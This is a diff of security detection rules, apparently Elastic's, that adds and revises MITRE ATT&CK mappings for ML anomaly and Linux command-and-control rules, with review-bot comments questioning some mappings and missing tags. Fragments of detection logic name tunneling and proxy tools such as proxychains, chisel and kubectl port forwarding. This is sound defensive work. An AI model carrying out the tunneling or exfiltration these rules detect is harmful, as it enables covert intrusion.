@@ -89,14 +89,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml index e62fe19f6d7..af481beafbb 100644 --- a/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_windows_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "windows"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -88,14 +88,26 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
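Review bot: Both rules on this line (`privileged_access_ml_windows_rare_region_name_by_user.toml` and `privileged_access_ml_windows_rare_source_ip_by_user.toml`) gain a TA0001 Initial Access entry reusing T1078 Valid Accounts, yet their `tags` arrays are untouched — each hunk starts immediately after `tags = [` with `type = "machine_learning"` as context, so the array closes unchanged above it. If a `"Tactic: Initial Access"` tag is expected to mirror the new tactic, add `"Tactic: Initial Access",` to each tags list, or confirm a later patch in this series does so. Listing T1078 under both Privilege Escalation and Initial Access is consistent with ATT&CK, where Valid Accounts spans several tactics, so that part needs no change.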
diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml index abb8bb47e03..f0e3a9b3eb4 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -94,14 +94,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml index 513d1a8b875..182abe9bb6f 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
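Review bot: Adding T1218 System Binary Proxy Execution to `defense_evasion_ml_rare_process_for_a_parent_process.toml` (the same change repeats for the other problemchild rules in this patch) is a broad claim for a machine-learning rare-process anomaly — the parent technique with no subtechnique asserts coverage of rundll32/regsvr32/mshta-style proxying that nothing visible in this diff ties the ML job to. If the job's feature set or the rule's `note` explains why anomalous child processes are expected to surface proxy execution, consider citing that in the rule description; otherwise T1036 Masquerading alone is the defensible mapping and coverage reports will overstate T1218 detection. The `tags` block closes just above the hunk and is unchanged, which is fine here because Defense Evasion is the rule's existing tactic.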
@@ -94,14 +94,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml index 22b4da6597d..9e43cb9de27 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -93,14 +93,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml index 7b94ae3ca14..1d01817a6fc 100644 
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -95,14 +95,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml index a5b82dcbbf8..9202b9bc1d7 100644 --- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml +++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/16" integration = ["problemchild", "endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -95,14 +95,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index 2bbc37b2ccd..543cda8067c 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/21" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,11 +94,15 @@ id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index cab972324d4..595b48de83d 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -156,6 +156,11 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -172,6 +177,11 @@ reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml index 5356874e6a6..a5c56ca1d6e 100644 --- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml +++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,16 @@ reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" 
@@ -152,3 +162,16 @@ framework = "MITRE ATT&CK" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index cfdde4aab58..f9a315aebd8 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,16 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml b/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml index 64968e762a3..a874dbd6731 100644 --- a/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml +++ b/rules/linux/command_and_control_frequent_egress_netcon_from_sus_executable.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
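Review bot: `command_and_control_cupsd_foomatic_rip_netcon.toml` now maps both T1190 Exploit Public-Facing Application (new, under Initial Access) and T1203 Exploitation for Client Execution (pre-existing context in the Execution entry on the previous line); these describe opposite attack directions, and the cups-browsed/foomatic-rip chain is a listening service being exploited rather than a client application, so T1203 looks like the one to drop or justify in the rule's `note`. The new Initial Access tactic also has no matching tags change in this file's diff (only the date hunk and the two threat hunks appear), so `"Tactic: Initial Access",` should be added to `tags` unless a later patch in the series does it. Adding T1059.004 Unix Shell to the Execution entry is appropriate if the query keys on a shell spawned by foomatic-rip, which the hunks don't show — worth confirming.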
@@ -174,3 +174,21 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index 8e5b77e396f..2f8b7c39e64 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,6 +121,16 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml index f810448aa2e..50818104f4f 100644 --- a/rules/linux/command_and_control_ip_forwarding_activity.toml +++ b/rules/linux/command_and_control_ip_forwarding_activity.toml 
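Review bot: The new Defense Evasion entry in `command_and_control_frequent_egress_netcon_from_sus_executable.toml` asserts T1564.001 Hidden Files and Directories, which is only justified if the rule's query (outside this hunk) matches dot-prefixed executables or paths such as `/tmp/.` — if it also fires on non-hidden suspicious locations like `/dev/shm` or `/var/tmp`, the subtechnique overclaims and the parent T1564, or no Defense Evasion entry at all, is the honest mapping. Please confirm against the query or state the rationale in the rule's description. A new tactic also means a `"Tactic: Defense Evasion"` tag is expected in `tags` if tags mirror threat tactics, and no tags hunk is present for this file.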
@@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml index 7eb417f4e4d..24c8efd7c55 100644 --- a/rules/linux/command_and_control_kubectl_networking_modification.toml +++ b/rules/linux/command_and_control_kubectl_networking_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,16 +122,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" - [[rule.threat.technique]] id = "T1090" name = "Proxy" reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" 
diff --git a/rules/linux/command_and_control_linux_chisel_client_activity.toml b/rules/linux/command_and_control_linux_chisel_client_activity.toml index 2f6eb95ac5b..9cda5267dd7 100644 --- a/rules/linux/command_and_control_linux_chisel_client_activity.toml +++ b/rules/linux/command_and_control_linux_chisel_client_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -163,6 +163,11 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml index acd204dae9a..2895259e81d 100644 --- a/rules/linux/command_and_control_linux_kworker_netcon.toml +++ b/rules/linux/command_and_control_linux_kworker_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,6 +128,11 @@ id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" @@ -145,7 +150,6 @@ reference = "https://attack.mitre.org/techniques/T1041/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] 
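Review bot: In `command_and_control_linux_kworker_netcon.toml`, T1036.004 Masquerade Task or Service is a questionable subtechnique for a process posing as a `kworker` kernel thread — that subtechnique covers renamed scheduled tasks and services, while a user-space binary adopting a kernel-thread name is closer to T1036.005 Match Legitimate Name or Location. Consider `id = "T1036.005"` / `name = "Match Legitimate Name or Location"` with the matching reference URL, or keep only the parent T1036 if the query (outside the hunk) does not distinguish the two. The chisel hunk's T1090 addition beside T1572 is consistent with how the other tunneling rules in this patch are mapped.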
diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml index c86530e3580..409f98fe875 100644 --- a/rules/linux/command_and_control_linux_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -139,6 +139,16 @@ process.name == "proxychains" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.003" +name = "Multi-hop Proxy" +reference = "https://attack.mitre.org/techniques/T1090/003/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml index b4d383c26e2..8cc7c5858d7 100644 --- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml +++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -134,14 +134,31 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml index 6af65daf2cc..12dfb33d13d 100644 --- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -169,6 +169,16 @@ process.name == "proxychains" and process.args : ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.003" +name = "Multi-hop Proxy" +reference = "https://attack.mitre.org/techniques/T1090/003/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" 
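Review bot: `command_and_control_linux_ssh_x11_forwarding.toml` gains a Lateral Movement entry with T1021.004 SSH, but this file's diff has only the date hunk and this threat hunk, so the `tags` array (well above line 134) is not updated with `"Tactic: Lateral Movement"`; add it or confirm a later patch in the series does. The mapping is defensible because the visible context (`process.parent.name in ("bash", ...)`) points at a client-side `ssh` invocation toward another host, which is what T1021.004 describes — if the rule also matches `sshd` accepting a forwarded X11 session, the Lateral Movement claim should be limited to the client side.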
diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml index a32949a8673..6bccac5ae54 100644 --- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml +++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -193,6 +193,21 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml index 971d4da2b10..7125dd7bc96 100644 --- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml +++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
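Review bot: The T1071.004 DNS subtechnique added to `command_and_control_linux_tunneling_and_port_forwarding.toml` is only accurate if the query (the `process where host.os.type == "linux"` EQL that begins above this hunk) actually matches DNS-tunneling tools such as iodine or dnscat2; if the rule is about generic SSH/socat/chisel port forwarding, DNS is an overclaim and the T1090 Proxy plus T1572 Protocol Tunneling entries already describe it. Please confirm against the query, or remove the `[[rule.threat.technique.subtechnique]]` block (and the parent T1071 with it, if no DNS case exists).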
@@ -118,6 +118,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml index f0209e6a64a..075f98f32fd 100644 --- a/rules/linux/command_and_control_potential_tunneling_command_line.toml +++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -170,6 +170,11 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml b/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml index a89abcbc982..a50b571510c 100644 --- a/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml +++ b/rules/linux/command_and_control_suspicious_network_activity_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -219,6 +219,33 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml index 7c6867e61ea..ee1d8633459 100644 --- a/rules/linux/command_and_control_telegram_api_request.toml +++ b/rules/linux/command_and_control_telegram_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
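Review bot: The new Persistence entry for `command_and_control_suspicious_network_activity_from_unknown_executable.toml` (T1037.004 RC Scripts and T1053.003 Cron) maps mechanisms this rule observes only indirectly — per the `[rule.new_terms]` context it is a new-terms detection on `process.executable` making network connections, so these subtechniques are justified only if the query (outside the hunk) constrains the parent to `cron`/`crond` or rc/init scripts; otherwise the entry should be dropped or reduced to what the query actually matches. No tags change appears for this file, so `"Tactic: Persistence"` would also need adding to `tags` if tags are expected to mirror threat tactics.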
